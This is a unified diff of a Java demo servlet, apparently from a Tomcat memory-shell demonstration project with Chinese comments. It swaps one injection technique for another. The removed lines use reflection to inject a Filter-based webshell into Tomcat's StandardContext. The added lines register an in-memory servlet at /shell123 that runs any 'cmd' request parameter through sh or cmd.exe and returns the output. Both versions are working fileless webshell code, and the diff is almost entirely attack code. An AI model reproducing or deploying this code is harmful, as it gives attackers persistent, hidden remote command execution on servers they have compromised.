@@ -1,11 +1,7 @@
 package com.example.tomcatmemshelldemo;
 
-import org.apache.catalina.Context;
 import org.apache.catalina.core.ApplicationContext;
-import org.apache.catalina.core.ApplicationFilterConfig;
 import org.apache.catalina.core.StandardContext;
-import org.apache.tomcat.util.descriptor.web.FilterDef;
-import org.apache.tomcat.util.descriptor.web.FilterMap;
 
 import javax.servlet.*;
 import javax.servlet.annotation.WebServlet;
@@ -14,27 +10,22 @@ import javax.servlet.http.HttpServletRequest;
 import javax.servlet.http.HttpServletResponse;
 import java.io.IOException;
 import java.io.InputStream;
-import java.lang.reflect.Constructor;
+import java.io.PrintWriter;
 import java.lang.reflect.Field;
-import java.util.Map;
 import java.util.Scanner;
 
 @WebServlet("/testServlet")
 public class TestServlet extends HttpServlet {
     @Override
     protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
-//        org.apache.catalina.loader.WebappClassLoaderBase webappClassLoaderBase = (org.apache.catalina.loader.WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
-//        org.apache.catalina.webresources.StandardRoot standardRoot = (org.apache.catalina.webresources.StandardRoot) webappClassLoaderBase.getResources();
-//        org.apache.catalina.core.StandardContext standardContext = (StandardContext) standardRoot.getContext();
-        // nice_oe3师傅测试该读取StandardContext测试报错,我也报错
+        final String name = "servletshell";
+        // 获取上下文
+        ServletContext servletContext = request.getSession().getServletContext();
 
-        Field Configs = null;
-        Map filterConfigs;
+        Field appctx = null;
         try {
-            // 这里是反射获取ApplicationContext的context，也就是standardContext
-            ServletContext servletContext = request.getSession().getServletContext();
+            appctx = servletContext.getClass().getDeclaredField("context");
 
-            Field appctx = servletContext.getClass().getDeclaredField("context");
             appctx.setAccessible(true);
             ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext);
 
@@ -42,75 +33,57 @@ public class TestServlet extends HttpServlet {
             stdctx.setAccessible(true);
             StandardContext standardContext = (StandardContext) stdctx.get(applicationContext);
 
-            String FilterName = "test_Filter";
-            Configs = standardContext.getClass().getDeclaredField("filterConfigs");
-            Configs.setAccessible(true);
-            filterConfigs = (Map) Configs.get(standardContext);
+            Servlet servlet = new Servlet() {
+                @Override
+                public void init(ServletConfig servletConfig) throws ServletException {
 
-            if (filterConfigs.get(FilterName) == null){
-                Filter filter = new Filter() {
-                    @Override
-                    public void init(FilterConfig filterConfig) throws ServletException {
-
-                    }
-
-                    @Override
-                    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
-                        HttpServletRequest req = (HttpServletRequest) servletRequest;
-                        if (req.getParameter("cmd") != null) {
-                            InputStream in = Runtime.getRuntime().exec(req.getParameter("cmd")).getInputStream();
-                            Scanner s = new Scanner(in).useDelimiter("\\A");
-                            String output = s.hasNext() ? s.next() : "";
-                            servletResponse.getWriter().write(output);
-                            return;
+                }
+                @Override
+                public ServletConfig getServletConfig() {
+                    return null;
+                }
+                @Override
+                public void service(ServletRequest servletRequest, ServletResponse servletResponse) throws ServletException, IOException {
+                    if (servletRequest.getParameter("cmd") != null) {
+                        String cmd = servletRequest.getParameter("cmd");
+                        boolean isLinux = true;
+                        String osTyp = System.getProperty("os.name");
+                        if (osTyp != null && osTyp.toLowerCase().contains("win")) {
+                            isLinux = false;
                         }
-//                        if (req.getParameter("cmd") != null){
-//                            byte[] bytes = new byte[1024];
-//                            Process process = new ProcessBuilder("cmd","/c",req.getParameter("cmd")).start();
-//                            int len = process.getInputStream().read(bytes);
-//                            servletResponse.getWriter().write(new String(bytes,0,len));
-//                            process.destroy();
-//                            return;
-//                        }
-                        filterChain.doFilter(servletRequest,servletResponse);
+                        String[] cmds = isLinux ? new String[]{"sh", "-c", cmd} : new String[]{"cmd.exe", "/c", cmd};
+                        InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
+                        Scanner s = new Scanner(in).useDelimiter("\\A");
+                        String output = s.hasNext() ? s.next() : "";
+                        PrintWriter out = servletResponse.getWriter();
+                        out.println(output);
+                        out.flush();
+                        out.close();
                     }
+                }
 
-                    @Override
-                    public void destroy() {
+                @Override
+                public String getServletInfo() {
+                    return null;
+                }
+                @Override
+                public void destroy() {
 
-                    }
-                };
+                }
+            };
 
-                // 反射获取FilterDef，设置filter名等参数后，调用addFilterDef将FilterDef添加
-                Class<?> FilterDef = Class.forName("org.apache.tomcat.util.descriptor.web.FilterDef");
-                Constructor declaredConstructors = FilterDef.getDeclaredConstructor();
-                FilterDef o = (FilterDef) declaredConstructors.newInstance();
-                o.setFilter(filter);
-                o.setFilterName(FilterName);
-                o.setFilterClass(filter.getClass().getName());
-                standardContext.addFilterDef(o);
+            org.apache.catalina.Wrapper newWrapper = standardContext.createWrapper();
+            newWrapper.setName(name);
+            newWrapper.setLoadOnStartup(1);
+            newWrapper.setServlet(servlet);
+            newWrapper.setServletClass(servlet.getClass().getName());
 
-                // 反射获取FilterMap并且设置拦截路径，并调用addFilterMapBefore将FilterMap添加进去
-                Class<?> FilterMap = Class.forName("org.apache.tomcat.util.descriptor.web.FilterMap");
-                Constructor<?> declaredConstructor = FilterMap.getDeclaredConstructor();
-                FilterMap o1 = (FilterMap) declaredConstructor.newInstance();
-                o1.addURLPattern("/*");
-                o1.setFilterName(FilterName);
-                o1.setDispatcher(DispatcherType.REQUEST.name());
-                standardContext.addFilterMapBefore(o1);
-
-                // 反射获取ApplicationFilterConfig，构造方法将FilterDef传入后获取filterConfig后，将设置好的filterConfig添加进去
-                Class<?> ApplicationFilterConfig = Class.forName("org.apache.catalina.core.ApplicationFilterConfig");
-                Constructor<?> declaredConstructor1 = ApplicationFilterConfig.getDeclaredConstructor(Context.class, FilterDef.class);
-                declaredConstructor1.setAccessible(true);
-                ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) declaredConstructor1.newInstance(standardContext, o);
-                filterConfigs.put(FilterName, filterConfig);
-                response.getWriter().write("Success");
-            }
+            standardContext.addChild(newWrapper);
+            standardContext.addServletMappingDecoded("/shell123",name);
+            response.getWriter().write("Inject Success");
 
         } catch (Exception e) {
             e.printStackTrace();
         }
-
     }
 }
